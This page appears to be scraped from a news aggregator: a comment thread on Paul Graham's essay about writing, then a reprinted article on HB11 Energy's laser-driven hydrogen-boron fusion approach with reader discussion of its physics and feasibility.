That's kind of the point. Writing isn't just a way to communicate ideas to other people, it's also a structured way to work through those ideas yourself.

alexandercrohde(4184) 4 days ago [-]

tl; dr:

1. Sets the topic of 'What is a good essay?'

2. Asserts that correctness is necessary, but not sufficient condition for a good essay.

3. Illustrates 2 by pointing out that by increasing vagueness, complete correctness is always possible. Characterizes correctness/precision as opposing forces.

4. Adds two more criteria for a good essay: telling people something important, and something they don't know

5. Adds the essential caveat that things we know subconsciously may be worth restating [crucially, we all certainly knew points 1-5 subconsciously]

6. Adds a fourth dimension to a good essay: 'as unequivocal as possible' [aka strength]

7. Highlights the inherent tradeoffs in satisfying these conditions. Increasing one dimension may reduce audience size.

8. Details a simple algorithm for only writing important/true things: reviewing/revising one's own ideas heavily before publishing (up to 100 times)

9. Proposes a technique to find important topics: examining the pool of topics one cares about

10. Proposes a technique to find novel topics: examining topics that you've thought about a lot [and surprised yourself with when you found a connection]

11. Suggests 'strength' [6] comes from thinking well and skillful use of qualifiers.

12. Adds another quality to what makes a good essay -- simplicity

-

13. Proposes that good essays (by this formula) are particularly likely to make people mad

14. Identifies one cause of anger: some of the widely held incorrect beliefs an essay calls out are likely to be cherished beliefs

15. Mentions that the strength component of very precise writing (as well as brevity) can come across as incredibly confident, and exacerbate the ruffling of feathers

16. Proposes that being misrepresented is particularly likely with this essay style, and isn't avoidable generally, but doesn't think one should worry too much about disingenuous misinterpretation.

-

17. Advises aspiring essayists to relax the constraint of breadth-of-audience/topics. Suggests publication isn't a necessity.

18. Provides some hopeful thoughts on the future of essays

jfarmer(3323) 4 days ago [-]

we all spinoza now

alexandercrohde(4184) 4 days ago [-]

Observations.

This is one of my longest tl; drs, particularly for a short essay. This to me signals high content ratio (low compressibility).

As somebody who tried for years to get people online to pay attention to my essays, I am not super confident that we have good content-discovery mechanisms for essays online [except video essays, which seem to thrive]. Thus I don't take this essay as personally relevant, as I am not personally convinced that a good essay written by an unfamous person would warrant enough attention to justify the rigorous revision process.

I notice PG chooses to view the essay through an artistic/historic lens that puts him in the minority. It seems to me he strives very hard to stay above the primal desires that dominate the internet-attention-economy. A very tough challenge.

dugditches(4313) 4 days ago [-]

While the Internet provides a platform for Essays, as he says, I think maybe a bigger point is it allowing the rise of 'Video Essays'.

Content creators are now turning out 30+ minute videos on a single subject. While in the past these tended to be 'dry' things like history and the like, more mainstream subjects are now being covered: movies, cars, current social issues, etc.

And just how much do you actually get from them? They're often spoken from positions of authority on a subject, and slick editing and video may reinforce their credibility to the viewer. But often they just feel like empty, stitched-together Wikipedia clippings with nice effects and humor sprinkled in to keep the viewer interested.

Compared to crafting words and language as this author describes, they just rely on a balance between entertainment and information.

TimPC(10000) 4 days ago [-]

A very small portion of videos are video essays, even if content creators are turning out 30 minutes on a single topic. The organization and structure of the argument is completely different. Usually the goal of a video is primarily entertainment, with an occasional secondary goal of being informative. Usually the goal of an essay is primarily to inform, with an occasional secondary goal of entertaining.

Jaruzel(982) 4 days ago [-]

Like TV before it, it's dumbing down the internet.

osdiab(3976) 4 days ago [-]

While the internet is full of garbage writing, I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go. That's a perfectionist attitude that stifles people's ability to explore, experiment, be wrong, learn, improve, and act. Like learning a language, if you never speak it because you're afraid to say something wrong, you'll never learn.

And separately, being enlightened with novel pithy facts isn't the only reason people write things. There's a lot that can't be transmitted in that form, and while I appreciate that style of writing for startup advice or a how-to guide, it's definitely not universally applicable.

injb(10000) 4 days ago [-]

'If you never speak it because you're afraid to say something wrong, you'll never learn'

If you're afraid to say your idea because you know (or suspect) that it's wrong, then you have already learned the hardest part of the lesson. Of course, it still remains to find out what the right idea is, but voicing one that you know to be wrong is hardly going to help with that.

throwawaylolx(10000) 4 days ago [-]

I think an otherwise interesting point is obscured by your construing of a strawman argument:

>I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go. That's a perfectionist attitude that stifles people's ability to explore, experiment, be wrong, learn, improve, and act.

It is dubious to imply that the author is trying to police what people can say and consequently how they can act: he's explicitly talking about _essays_, a literary form typically used for advancing arguments. By reframing his argument as an attempt at 'telling people that they shouldn't say anything wrong,' you're arguing against a much less interesting argument and sidestepping the central theme of _essays_ altogether.

In other words, I think the claim that good essays need not show novelty, correctness, strength, and importance is a much more interesting argument, and, against correctness at least, one can probably find intellectual companionship among early 20th century futurists, dadaists, and later on fascists.

lliamander(4319) 4 days ago [-]

Writing is hard. For many people, writing anything at all is a struggle. That struggle can also go away with practice. Eventually you get to the point where expressing yourself with the written word becomes very natural.

Of the criteria that Paul suggested (true, important, novel, clear) I would say that novice writers should strive to write with just one of those qualities (which can vary from one piece of writing to another).

As you achieve fluency and words just flow from the pen (or keyboard) and the focus shifts away from being able to express yourself, you add the other criteria to improve the quality of the ideas you express.

6gvONxR4sf7o(10000) 4 days ago [-]

>... I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go.

I think you're putting words in his mouth. You seem to be reading it as 'only write useful things' rather than 'how to write usefully.' You laid out a number of reasons that writing doesn't need to be useful to others, which is great, but doesn't contradict the essay how you seem to think it does.

hinkley(4219) 4 days ago [-]

It's the sort of advice you get from either a worrier or someone who has already perfected their craft.

And in an era where people talk a lot about how others achieve something and then 'close the door behind them', well, this is closing the door behind you, Paul.

jimbokun(4130) 4 days ago [-]

'I don't feel like telling people that they shouldn't say anything wrong or potentially unimportant is the right way to go.'

The problem is far too many people err in the opposite direction. I don't see an Internet only consisting of perfectly reasoned and argued content, with everyone else fearfully staying quiet. I see countless comments suggesting the writer didn't take a second to consider contrary viewpoints, or facts that might undermine their argument, or stating things with certainty without regard to whether or not they have a factual basis.

keiferski(1025) 4 days ago [-]

As a counterpoint, I'd argue that the 'mathematical' approach to good writing is inherently flawed. That is, trying to arrive at the formula for the 'best' essay via dialectic (argument) is to miss the forest for the trees. Writing is an art, not a science. Formal logic was developed to display arguments, so if you are trying to be as precise and mathematical as possible, use that instead.

Instead, I'd suggest reading the great writers of the past and present (but focus more on the past). Study what works, what speaks to you, what stylistic approach you favor, and so on. As a bonus, you'll learn more about what has been said by other intelligent people and subsequently avoid writing over-confident, ill-informed essays...

If you're looking for stellar examples of essay-writing, I personally recommend Jorge Luis Borges and David Foster Wallace. Both manage to write in a manner both erudite and coherent, without seeming too florid or too simplistic. Here are a few samples:

- A New Refutation of Time, Borges: https://www.gwern.net/docs/borges/1947-borges-anewrefutation...

- The Analytical Language of John Wilkins, Borges: http://www.alamut.com/subj/artiface/language/johnWilkins.htm...

- David Lynch and Lost Highway, Wallace: http://www.lynchnet.com/lh/lhpremiere.html

- Laughing with Kafka, Wallace: https://harpers.org/wp-content/uploads/HarpersMagazine-1998-...

- Consider the Lobster, Wallace: http://www.columbia.edu/~col8/lobsterarticle.pdf

Edit: added some more essay links.

randcraw(4314) 4 days ago [-]

> Writing is an art, not a science.

Writing fiction may be an art, but writing nonfiction is a craft. And essays are nonfiction.

The creator of art seeks somehow to offer fresh insight, often employing some form of novelty, be it technique, medium, context, perspective, etc.

Craft, however, isn't about novelty; it's about engineering a clear convincing message effectively, efficiently, and ideally... memorably and with elan.

I admit the line between art and craft is often blurry (probably because the craftsman has taken too much artistic license). Unlike art, the techniques employed in an essay should never impede its purpose. There, it's only the message that matters, not the medium.

CaptArmchair(10000) 4 days ago [-]

I think the fallacy is in the premise: 'An essay should be useful.'

Well, useful is always in the eye of the beholder. There is no such thing as an absolute truth, after all. And pretending there is, and it's even attainable, is intellectually dishonest.

Sure, an essay could be a formal piece that takes an almost 'mathematical' approach. After all, an essay is first and foremost an argument presented by the author. Even a flawed argument is still an argument. And a flawed essay is still an essay.

The fallacy here is being implicitly reductionist. If your premise states 'an essay should be useful' then you're basically reducing the definition of what an essay is to a formal argument based on logic and falsifiable facts, and rejecting any other text as 'not an essay' or, worse, 'not useful' (whatever that might mean), or even 'nonsense' or 'a dumb thing to say'.

A quick glance at Wikipedia dispels such reductionism rather swiftly:

https://en.wikipedia.org/wiki/Essay

Notwithstanding that, I think PG's essay does contain some excellent personal advice on writing style and technique itself. No more, no less. His sin is confounding form and function. The former always follows the latter, never the inverse.

philwelch(3940) 4 days ago [-]

I like David Foster Wallace as a writer and he's as much an authority as anyone when it comes to writing well, but I think there's a pretty major difference in terms of goals and priorities. PG is writing about writing as a means of processing ideas. He's taking the perspective of a structural engineer, not an architect. While Wallace wrote beautifully, PG is writing about writing usefully, even if that writing is bare and unornamented. And while that may not be your preferred style, I wouldn't dismiss it as something that someone would want to do.

artsr(10000) 4 days ago [-]

> Writing is an art, not a science.

I agree with this, but avoiding writing nonsense is science, and not art. So there definitely is a scientific aspect to writing.

vasilipupkin(4269) 4 days ago [-]

There is a difference between a literary essay and the kind PG is talking about here. PG's essays are closer to business commentary than to literary essays. Some of these insights apply to all essays anyway, but don't confuse the different types of essays.

the_af(10000) 4 days ago [-]

First of all: interesting post!

But since you mentioned Borges let me offer a counter-counterpoint: Borges was obsessive about his writings and can be considered 'mathematical' about them. He chopped away anything that didn't fit and was very careful about the construction of sentences. He was so obsessed that he recalled -- or so I read somewhere -- something that was already printed in order to make corrections to it.

Poe claimed he was quite 'mathematical' (or maybe the word is 'methodical', or 'analytical') about the construction of his famous poem The Raven. While this claim is disputed, or maybe he exaggerated, at least it's something he liked to claim about some of his work.





Historical Discussions: Radical hydrogen-boron reactor leapfrogs current nuclear fusion tech? (February 21, 2020: 753 points)

(757) Radical hydrogen-boron reactor leapfrogs current nuclear fusion tech?

757 points 4 days ago by chris_overseas in 2313th position

newatlas.com | Estimated reading time – 6 minutes | comments | anchor

'We are sidestepping all of the scientific challenges that have held fusion energy back for more than half a century,' says the director of an Australian company that claims its hydrogen-boron fusion technology is already working a billion times better than expected.

HB11 Energy is a spin-out company that originated at the University of New South Wales, and it announced today a swag of patents through Japan, China and the USA protecting its unique approach to fusion energy generation.

Fusion, of course, is the long-awaited clean, safe theoretical solution to humanity's energy needs. It's how the Sun itself makes the vast amounts of energy that have powered life on our planet up until now. Where nuclear fission – the splitting of atoms to release energy – has proven incredibly powerful but insanely destructive when things go wrong, fusion promises reliable, safe, low cost, green energy generation with no chance of radioactive meltdown.

It's just always been 20 years away from being 20 years away. A number of multi-billion dollar projects are pushing slowly forward, from the Max Planck Institute's insanely complex Wendelstein 7-X stellarator to the 35-nation ITER Tokamak project, and most rely on a deuterium-tritium thermonuclear fusion approach that requires the creation of ludicrously hot temperatures, much hotter than the surface of the Sun, at up to 15 million degrees Celsius (27 million degrees Fahrenheit). This is where HB11's tech takes a sharp left turn.

The result of decades of research by Emeritus Professor Heinrich Hora, HB11's approach to fusion does away with rare, radioactive and difficult fuels like tritium altogether – as well as those incredibly high temperatures. Instead, it uses plentiful hydrogen and boron B-11, employing the precise application of some very special lasers to start the fusion reaction.

Here's how HB11 describes its 'deceptively simple' approach: the design is 'a largely empty metal sphere, where a modestly sized HB11 fuel pellet is held in the center, with apertures on different sides for the two lasers. One laser establishes the magnetic containment field for the plasma and the second laser triggers the 'avalanche' fusion chain reaction. The alpha particles generated by the reaction would create an electrical flow that can be channeled almost directly into an existing power grid with no need for a heat exchanger or steam turbine generator.'

HB11's Managing Director Dr. Warren McKenzie clarifies over the phone: 'A lot of fusion experiments are using the lasers to heat things up to crazy temperatures – we're not. We're using the laser to massively accelerate the hydrogen through the boron sample using non-linear forces. You could say we're using the hydrogen as a dart, and hoping to hit a boron nucleus, and if we hit one, we can start a fusion reaction. That's the essence of it. If you've got a scientific appreciation of temperature, it's essentially the speed of atoms moving around. Creating fusion using temperature is essentially randomly moving atoms around and hoping they'll hit one another; our approach is much more precise.'

'The hydrogen/boron fusion creates a couple of helium atoms,' he continues. 'They're naked heliums, they don't have electrons, so they have a positive charge. We just have to collect that charge. Essentially, the lack of electrons is a product of the reaction and it directly creates the current.'

A small pellet of hydrogen/boron fuel is placed in a large sphere and hit with two lasers simultaneously to create a fusion reaction that directly generates electricity with no steam turbines required

HB11

The lasers themselves rely upon cutting-edge 'Chirped Pulse Amplification' technology, the development of which won its inventors the 2018 Nobel prize in Physics. Much smaller and simpler than any of the high-temperature fusion generators, HB11 says its generators would be compact, clean and safe enough to build in urban environments. There's no nuclear waste involved, no superheated steam, and no chance of a meltdown.

'This is brand new,' Professor Hora tells us. '10-petawatt power laser pulses. It's been shown that you can create fusion conditions without hundreds of millions of degrees. This is completely new knowledge. I've been working on how to accomplish this for more than 40 years. It's a unique result. Now we have to convince the fusion people – it works better than the present day hundred million degree thermal equilibrium generators. We have something new at hand to make a drastic change in the whole situation. A substitute for carbon as our energy source. A radical new situation and a new hope for energy and the climate.'

Indeed, says Hora, experiments and simulations on the laser-triggered chain reaction are returning reaction rates a billion times higher than predicted. This cascading avalanche of reactions is an essential step toward the ultimate goal: reaping far more energy from the reaction than you put in. The extraordinary early results lead HB11 to believe the company 'stands a high chance of reaching the goal of net energy gain well ahead of other groups.'

"As we aren't trying to heat fuels to impossibly high temperatures, we are sidestepping all of the scientific challenges that have held fusion energy back for more than half a century," says Dr McKenzie. "This means our development roadmap will be much faster and cheaper than any other fusion approach. You know what's amazing? Heinrich is in his eighties. He called this in the 1970s, he said this would be possible. It's only possible now because these brand new lasers are capable of doing it. That, in my mind, is awesome.'

Dr McKenzie won't however, be drawn on how long it'll be before the hydrogen-boron reactor is a commercial reality. 'The timeline question is a tricky one,' he says. 'I don't want to be a laughing stock by promising we can deliver something in 10 years, and then not getting there. First step is setting up camp as a company and getting started. First milestone is demonstrating the reactions, which should be easy. Second milestone is getting enough reactions to demonstrate an energy gain by counting the amount of helium that comes out of a fuel pellet when we have those two lasers working together. That'll give us all the science we need to engineer a reactor. So the third milestone is bringing that all together and demonstrating a reactor concept that works.'

This is big-time stuff. Should cheap, clean, safe fusion energy really be achieved, it would be an extraordinary leap forward for humanity and a huge part of the answer for our future energy needs. And should it be achieved without insanely hot temperatures being involved, people would be even more comfortable having it close to their homes. We'll be keeping an eye on these guys.

Source: University of New South Wales




All Comments: [-] | anchor

eveningcoffee(4302) 4 days ago [-]

The cool thing about this is that it will use direct energy capture, if I understand it correctly.

'The hydrogen/boron fusion creates a couple of helium atoms,' he continues. 'They're naked heliums, they don't have electrons, so they have a positive charge. We just have to collect that charge. Essentially, the lack of electrons is a product of the reaction and it directly creates the current.'

javajosh(3916) 4 days ago [-]

Yes it seems like you could generate extreme levels of electrostatic force by collecting the Helium nuclei. Do that on one side of a capacitor, periodically short it out (producing ordinary Helium) to clear both plates, and repeat. So yeah a machine which takes hydrogen and boron and emits helium gas and electricity. Sounds like it's worth doing, at least for the sake of children's birthday parties.

hinkley(4219) 4 days ago [-]

This doesn't sound like it would be more energy-dense than a chemical reaction. How much power can you extract - electrically - from two alpha particles?
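For rough scale, using the 8.7 MeV per p-11B reaction quoted later in the thread (each reaction actually yields three alpha particles at roughly 2.9 MeV apiece), the energy per unit mass of fuel is

$$\frac{8.7\ \text{MeV}}{12\ \text{u}} \approx \frac{1.4\times 10^{-12}\ \text{J}}{2.0\times 10^{-26}\ \text{kg}} \approx 7\times 10^{13}\ \text{J/kg},$$

roughly a million times the ~5 × 10^7 J/kg of a chemical fuel like gasoline, so energy density per reaction isn't the limitation; extracting it electrically is the open question.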

acidburnNSA(3665) 4 days ago [-]

Presumably the lasers have produced enough energy to ionize helium generated in the target. It's quite unclear how a net energy gain will be extracted simply by grabbing the moving ions electrically. That sounds like a huge extra challenge on top of achieving net positive controlled fusion.

There will inevitably be a lot of heat produced that has to be cooled. Generally people plan to use the coolant as the working fluid in the power cycle.

If there's an innovation here it'd be cool if they put it way more up front.

In any case there will still be a coolant.

andymoe(3975) 4 days ago [-]

So... what is their Current Q number?

"The fusion energy gain factor, usually expressed with the symbol Q, is the ratio of fusion power produced in a nuclear fusion reactor to the power required to maintain the plasma in steady state." [1]

[1] https://en.m.wikipedia.org/wiki/Fusion_energy_gain_factor

DennisP(3581) 4 days ago [-]

Currently zero, because the necessary lasers are just now becoming available.

In theory, they've got a kJ laser to generate the magnetic field, a 30kJ laser hitting the fuel, and a GJ energy output, for Q over 30,000 minus whatever losses you have in the lasers and electricity harvesting.

https://aip.scitation.org/doi/10.1016/j.mre.2017.05.001
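Sanity-checking those figures (a back-of-envelope under the paper's stated scenario: ~1 kJ for the field-generating laser, ~30 kJ for the fusion-triggering laser, ~1 GJ out):

$$Q \approx \frac{E_{\text{out}}}{E_{\text{in}}} \approx \frac{10^{9}\ \text{J}}{(1+30)\times 10^{3}\ \text{J}} \approx 3.2\times 10^{4},$$

before accounting for laser wall-plug efficiency and charge-collection losses, which is what the 'minus whatever losses' caveat covers.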

sam(3646) 4 days ago [-]

If new fusion startups like this one are interesting to folks on this thread, here's a list of companies working on fusion energy that I've compiled:

https://www.fusionenergybase.com/organizations/

baddash(4031) 4 days ago [-]

thanks :D

Vinceo(10000) 4 days ago [-]

Thank you. Your site in general is a great resource on fusion.

DeusExMachina(1116) 4 days ago [-]

Can somebody with more understanding tell me if this idea I had is stupid or has some merit?

Fusion will deliver an incredible amount of energy, making it cheap. Everybody then turns up their energy consumption since it costs nothing. Raise heating in houses, use AC everywhere, longer showers, more transportation, etc.

All this energy eventually becomes heat. Can it get to a threshold where it can influence temperature on a global scale even if it lowers carbon emissions? What am I missing?

DennisP(3581) 4 days ago [-]

There's waste heat from our power plants today, but it's an extremely minor factor compared to carbon emissions. However, if we were to continue our current rate of exponential energy growth on this planet, we would boil the oceans in 400 years.

https://dothemath.ucsd.edu/2012/04/economist-meets-physicist...
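A minimal sketch of the linked post's scaling argument (the ~18 TW and 2.3%/yr figures are assumptions consistent with it):

    import math

    # At a steady exponential growth rate, how long until human power
    # production rivals the total sunlight intercepted by Earth?
    current_power = 18e12    # W: rough current world power consumption
    solar_input = 1.74e17    # W: total solar power hitting Earth (~174 PW)
    growth_rate = 0.023      # 2.3% per year, the post's historical figure

    years = math.log(solar_input / current_power) / math.log(1 + growth_rate)
    print(f'~{years:.0f} years')  # prints ~404 years, the same order as the post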

On the other hand, compact fusion power would make for some great rockets, so by the time it's common it would probably make sense to move most of the growth off planet.

stjohnswarts(10000) 3 days ago [-]

You should be far more worried about CO2, methane and other greenhouse gases than about waste heat, which is just a drop in the ocean compared to the greenhouse gas issues.

Vysero(10000) 4 days ago [-]

No, the idea has no merit.

andys627(4016) 4 days ago [-]

Use free energy to sequester infinite carbon!

Tade0(10000) 4 days ago [-]

Orders of magnitude. Total Earth solar irradiance is on the order of hundreds of petawatts, while total world installed power plant capacity sits at a few terawatts.

We're simply unable to measurably increase the amount of heat on the surface of Earth directly.
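Those orders of magnitude are easy to verify from the solar constant (~1361 W/m^2) and Earth's radius (~6371 km):

$$P_{\odot} \approx S \cdot \pi R_E^2 \approx 1361 \times \pi \times (6.371\times 10^{6})^2 \approx 1.7\times 10^{17}\ \text{W} \approx 170\ \text{PW},$$

against a few terawatts of installed generating capacity, a gap of nearly five orders of magnitude.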

nnq(4136) 4 days ago [-]

> energy [...] costs nothing. Raise heating in houses, use AC everywhere, longer showers, more transportation

Yay, can we get to this future faster?! Joking aside, all the current eco-friendly tech diminishes comfort by a loooot... we need low-energy habitats that are actually comfortable, ffs.

For example, traveling around Europe, I see that the new trend in the developed/western part is to shiver your ass off during the cold months and to melt your brains out during the hot ones in almost all public spaces! Like we're back in the pre-AC era! You need to get to Eastern Europe's bigger cities to enjoy comfy heating/cooling habits like proper heating in the winter (yes, I want my >25 C in winter!) and proper cooling in the summer (<18 C please!)... It's wasteful, but very much enjoyable! Snow fighting after/before coming out of/going into a 30+ C heated house is bliss :D Same as blasting through an enjoyable heatwave after jumping out of a 15 C office and then back in. Life's little pleasures.

After we invest so much of our lives in developing technology, we should at least enjoy the simple comforts and pleasures it freaking offers!

jimbokun(4130) 4 days ago [-]

> the design is 'a largely empty metal sphere, where a modestly sized HB11 fuel pellet is held in the center, with apertures on different sides for the two lasers. One laser establishes the magnetic containment field for the plasma and the second laser triggers the 'avalanche' fusion chain reaction. The alpha particles generated by the reaction would create an electrical flow that can be channeled almost directly into an existing power grid with no need for a heat exchanger or steam turbine generator.'

> HB11 says its generators would be compact, clean and safe enough to build in urban environments.

Video: https://www.youtube.com/watch?v=OxEX8UueZ4U

galangalalgol(10000) 4 days ago [-]

How do alpha particles get turned into current on a line?

foreigner(4274) 4 days ago [-]

As a bonus it produces helium, which we've been running low on, right? Break out the party balloons!

StavrosK(485) 4 days ago [-]

All fusion produces helium, though. I don't think anyone is looking into fusing heavier atoms.

Throwaway984332(10000) 4 days ago [-]

It's a bit weird to say we're running out of He, at least not unless we're also running out of CH4. Which, theoretically, we are.

But practically, with CH4, our modern concern is not running out of it, but the associated GHG emissions of producing and burning it.

So we won't run out of He, so much as stop producing it.

jl6(4302) 4 days ago [-]

> First milestone is demonstrating the reactions, which should be easy.

They haven't even demonstrated the reaction? What's all the talk about results being "billions" of times better than expected?

willis936(10000) 4 days ago [-]

As someone who works on a stellarator: no plasma experiment in fusion research is easy to do.

noselasd(4132) 4 days ago [-]

Simulations.

wefarrell(10000) 4 days ago [-]

Can someone explain why this is considered fusion? The reaction involves shooting a proton (hydrogen) at a boron nucleus and outputting 3 alpha particles. That seems more like the nucleus being split apart than fused together.

DennisP(3581) 4 days ago [-]

The explanation I've heard from a fusion scientist is that as far as they're concerned, if you're initiating the reaction by colliding nuclei, it's fusion, and if you're initiating it by hitting a large nucleus with a neutron, it's fission.

cstross(806) 4 days ago [-]

Start here: https://en.wikipedia.org/wiki/Aneutronic_fusion

(TLDR version: proton-boron fusion is a less energetically efficient alternative to 3He fusion, but with the howlingly significant advantage that boron -- the fuel -- is lying around in heaps and drifts on Earth, rather than being so exotic a substance that annual global production is measured in single-digit kilograms and a significant energy economy would require mining it from the Lunar regolith. It's not as well-known as 3He fusion, though, because the space cadets don't see the point -- there are no Moon colonies required. Advantages of 3He or B + p fusion over D-T fusion: it doesn't produce a surplus of neutrons, so there's less radioactive waste created as a by-product of the process.)

acidburnNSA(3665) 4 days ago [-]

It has to do with something called the Binding Energy Per Nucleon. If you march up the curve from small numbers to get energy, you are doing fusion. If you march down the curve from high numbers, you are doing fission. If you march up the curve from small numbers and go all the way to large numbers even though that's endothermic, you are a supernova.

https://en.wikipedia.org/wiki/Nuclear_binding_energy#Nuclear...
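A quick worked instance, using standard total binding energies (about 28.3 MeV for 4He and 76.2 MeV for 11B; a lone proton has none):

$$\Delta E = 3\,B(^{4}\text{He}) - B(^{11}\text{B}) - B(p) \approx 3 \times 28.3 - 76.2 - 0 \approx 8.7\ \text{MeV},$$

which matches the 8.7 MeV per reaction cited elsewhere in the thread: the products sit higher up the binding-energy-per-nucleon curve than the reactants, so by this bookkeeping it's fusion.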

ars(3157) 4 days ago [-]

Because you are fusing a proton to a boron nucleus.

After that there is radioactive decay (the splitting).

To be fission you have to actually [actively] break the atom apart, which isn't happening here.

tln(10000) 4 days ago [-]

It would be awesome to know what experiments they've done, or if this is all simulation

DennisP(3581) 4 days ago [-]

There have been experiments, but only at lower power than required for fusion. From their latest paper:

> A significant case of nonlinear deviation from classical linear physics was seen by the measurements, how the laser opened the door to the principle of nonlinearity and could be seen from the effect measured by Linlor [9] followed by others (see [7] p. 31) when irradiating solid targets with laser pulses of several ns duration. At less than one MW power, the pulses heated the target surface to dozens of thousand °C and the emitted ions had energies of few eV as expected in the usual way following classically. When the power of the nanosecond laser pulses was exceeding a significant threshold of few MW, the ions – suddenly – had thousand times higher energies. These keV ions were separated with linear increase on the ion charge indicating that there was not a thermal equilibrium process involved.

Lasers adequate for fusion are just now becoming available.

https://www.hb11.energy/news-and-publications

penetrarthur(4154) 4 days ago [-]

> and most rely on a deuterium-tritium thermonuclear fusion approach that requires the creation of ludicrously hot temperatures, much hotter than the surface of the Sun, at up to 15 million degrees Celsius (27 million degrees Fahrenheit).

Surface of the Sun: ~6,000 °C

Center of the Sun: ~15,000,000 °C

dmos62(4140) 4 days ago [-]

It's not often that the child in me goes 'that's awesome!', but this is one of those times.

FredrikMeyer(10000) 4 days ago [-]

I think they might be thinking of the corona of the sun

> The temperature in the corona is more than a million degrees, surprisingly much hotter than the temperature at the Sun's surface which is around 5,500° C

https://scied.ucar.edu/solar-corona

andreiklochko(10000) 4 days ago [-]

To shed a different light on this: think of temperature as walking through mud. Your legs lose energy trying to slowly pull a lot of mud behind you. Now think about skiing. A lot less snow is dragged with you but it flies fast.

Here, what is interesting is that if one fusion reaction does happen, the alpha (helium) particles leave at 2.9 MeV. After two collisions with protons, if the second proton that got hit in turn hits a boron nucleus, it will have just the right energy (612 keV) to maximize the chances of initiating a second fusion reaction.

612 keV is almost 7 billion °C if considered as thermal energy, and no experiment anywhere will stay that hot for long. But compared to the energy of the exiting helium nuclei, it's still much lower (0.612 MeV vs 2.9 MeV).
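(For reference, the conversion behind that figure, treating 612 keV as a thermal energy via E = k_B T:

$$T = \frac{E}{k_B} = \frac{612\times 10^{3} \times 1.602\times 10^{-19}\ \text{J}}{1.381\times 10^{-23}\ \text{J/K}} \approx 7.1\times 10^{9}\ \text{K},$$

i.e. roughly 7 billion degrees.)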

In other words, instead of cascading all the energy down and hoping the sea of particles rises to a few billion degrees so that enough particles fuse to keep the sea of other particles hot, here the energy is preempted by protons after just 2 collisions and used immediately to start a second reaction, which yields more helium nuclei at 2.9 MeV, essentially producing an 'avalanche' effect.

Finally, yes, they seem to have devised a way to obtain at least a small part of the energy electrically, without relying on thermal energy, via direct electric field deceleration of very fast charged particles.

This is like 'the ultra rich (very fast particles) manage to create value among themselves without having to cascade their wealth down to the crowd (cold particles), and then upload that value to hyperspace (the electric field from the electrodes), without ever interacting with the mass of the crowd (the mass of the target), until a sufficient amount of fusion reactions have been realized'

The avalanche process is explained in Hora's 2016 publication, with a schematic page 9: https://aip.scitation.org/doi/10.1016/j.mre.2017.05.001

And yes, a petawatt (the power of present-day ultra-fast lasers) is a lot of power. It was just chance that there was very little practical use for this kind of power - until now.

That being said, I am not a true expert on this topic myself, so the true barriers lying in front of this concept might be better explained by the other comments here.

pas(10000) 4 days ago [-]

Is there any description of how the 'hit a capacitor coil with a laser to generate a magnetic field' thing works?

https://www.cambridge.org/core/services/aop-cambridge-core/c... I found this overview a bit confusing and sort of low quality, but at least it references a lot of papers. (But haven't started hunting down any of them.)

UnFleshedOne(4289) 4 days ago [-]

'the ultra rich (very fast particles) manage to create value among themselves without having to cascade their wealth down to the crowd (cold particles), and then upload that value to hyperspace (the electric field from the electrodes), without ever interacting with the mass of the crowd (the mass of the target)'

Are you saying this kind of fusion is anti social justice? We should ban this immediately!

nkrisc(4311) 4 days ago [-]

> This is like 'the ultra rich (very fast particles) manage to create value among themselves without having to cascade their wealth down to the crowd (cold particles), and then upload that value to hyperspace (the electric field from the electrodes), without ever interacting with the mass of the crowd (the mass of the target), until a sufficient amount of fusion reactions have been realized'

This was actually a helpful analogy for me. I'll have to take your word on the accuracy of it, though.

pfdietz(10000) 4 days ago [-]

I am very skeptical of this approach.

The big problem I have is the direct conversion approach being suggested. The idea, as I understand it, was that the target is placed at the center of a large sphere, and is negatively charged, so the alpha particles from fusion slow down as they go up the potential to the surrounding spherical collector.

You see the problem with this, I hope. The violent and energetic event at the target will produce gas and plasma, and lots of free electrons. What is stopping that from shorting out this megavolt vacuum capacitor?

jabl(10000) 3 days ago [-]

The direct conversion stuff doesn't seem that critical. If that doesn't work out immediately, surely the first generation can use good old steam Rankine power conversion (or sCO2 Brayton, if that is deemed mature enough).

My worry is whether the specific fusion reactor concept itself is viable.

acidburnNSA(3665) 4 days ago [-]

Always happy to see people doing new and interesting stuff with fusion. I got into nuclear technology because of ITER back in the early 2000s. Worked on it continuously (mostly in advanced fission) ever since.

> 'The timeline question is a tricky one,' he says. 'I don't want to be a laughing stock by promising we can deliver something in 10 years, and then not getting there. First step is setting up camp as a company and getting started. First milestone is demonstrating the reactions, which should be easy. Second milestone is getting enough reactions to demonstrate an energy gain by counting the amount of helium that comes out of a fuel pellet when we have those two lasers working together. That'll give us all the science we need to engineer a reactor. So the third milestone is bringing that all together and demonstrating a reactor concept that works.'

The fourth step is to deliver the reactor concept as a promising machine. The fifth step is to attach it to power generating equipment and demonstrate the power plant. The sixth step is to scale up a supply chain capable of delivering multiple units that compete with other sources of commodity electricity (or other energy products). The seventh step is to scale to a large fleet without being unduly burdened by either the supply chain (raw material, skilled labor) or the regulatory impact/public concern that inevitably scales with any large fleet of any new tech.

Fission made it to step 7 and then faltered and is now teetering depending on where you look. It never scaled past 5% of total world primary energy.

The promise of fusion is to deliver nuclear energy with less public concern than fission because it makes less radiologically hazardous material. The challenge is to go through the physical, engineering, and commercial viability phases as a power plant.

Accujack(10000) 4 days ago [-]

Love the user name. I always thought that movie was amusing, and so is the NSA :)

anonuser123456(10000) 4 days ago [-]

>I got into nuclear technology because of ITER back in the early 2000s. Worked on it continuously (mostly in advanced fission) ever since.

What is your opinion on SPARC and Tokamak Energy?

sf_rob(10000) 4 days ago [-]

Tangent, but assuming fusion energy generation will be a reality in the next 30 years, what do you believe the price/kWh will be? I am not knowledgeable enough to parse the estimates I've seen and want to believe in the post-energy-scarcity future.

1024core(4313) 4 days ago [-]

Apparently Step 5 is not needed?

> The alpha particles generated by the reaction would create an electrical flow that can be channeled almost directly into an existing power grid with no need for a heat exchanger or steam turbine generator.'

dfsegoat(3842) 4 days ago [-]

FWIW as an aside: I always scan comments on nuke-related HN posts to find yours first. Super informative and easy to digest. Thanks again.

ccleve(4283) 4 days ago [-]

A number of these steps become easier if the reactor is physically small. A plant that fits in a shipping container has a way easier path to commercial viability.

Small plants require less capital. They're easier to manufacture. They can iterate faster. They have less environmental impact, and therefore fewer regulatory hurdles. They require less labor to build and a smaller supply chain.

